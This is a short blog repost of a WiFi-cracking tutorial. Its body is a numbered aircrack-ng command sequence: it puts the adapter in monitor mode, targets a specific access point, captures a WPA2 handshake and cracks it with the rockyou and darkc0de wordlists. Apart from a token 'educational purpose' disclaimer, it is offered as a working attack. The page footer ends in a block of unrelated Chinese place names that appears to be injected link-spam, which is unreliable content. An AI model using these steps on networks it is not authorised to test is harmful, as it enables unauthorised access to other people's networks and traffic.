paulwong

          My Links

          Blog Stats

          常用鏈接

          留言簿(67)

          隨筆分類(1391)

          隨筆檔案(1149)

          文章分類(7)

          文章檔案(10)

          相冊

          收藏夾(2)

          AI

          Develop

          E-BOOK

          Other

          養生

          微服務

          搜索

          最新評論

          閱讀排行榜

          評論排行榜

          60天內閱讀排行

          Hack a Wifi Network WPA2/WPA/WEP

          First of all you will need a Linux operating system & a little education about Python
          programming.
          You can install Linux operating system on any Pc or Laptop.
          Note : This tutorial is only for eduactional purpose. The author of this pdf is not responsible for any illegal work. During installing and setting up you can loose all of your data, Do not do if you don’t know about programming.
          Device:
          Use Tp-link TL-WN722N Wifi Adapter for High gain.
          Start! Open Terminal:
          1. airmon-ng check kill
          2. airmon-ng
          3. airmon-ng start wlan0
          4. airodump-ng wlan0mon
          5. (control + c to stop)
          6. airodump-ng wlan0mon —bssid 5C:F9:6A:CD:8A:1D -c 1 -w WPA2
          7. wait for 1 minute, capture handshake
          8. aircrack-ng WPA2-01.cap -w /root/rockyou.txt
          /darkc0de
          /Wpa list 1,2,3

          darkc0de, Wpalist & rockyou.txt are the dictionaries files. You can download these from internet.
          This PDF is made by Malik Mubashir

          posted on 2016-04-05 16:53 paulwong 閱讀(481) 評論(0)  編輯  收藏 所屬分類: LINUX

          主站蜘蛛池模板: 建宁县| 墨脱县| 南通市| 微山县| 大余县| 津南区| 溧水县| 阳谷县| 石柱| 巴林左旗| 连南| 东港市| 宜丰县| 德保县| 日照市| 沙田区| 绥滨县| 鄢陵县| 稻城县| 东方市| 普陀区| 阿城市| 玉树县| 麟游县| 曲阜市| 扎鲁特旗| 正安县| 莱阳市| 新闻| 汕头市| 凤山市| 茌平县| 西乡县| 呼和浩特市| 大洼县| 利津县| 新蔡县| 定安县| 腾冲县| 冕宁县| 桐梓县|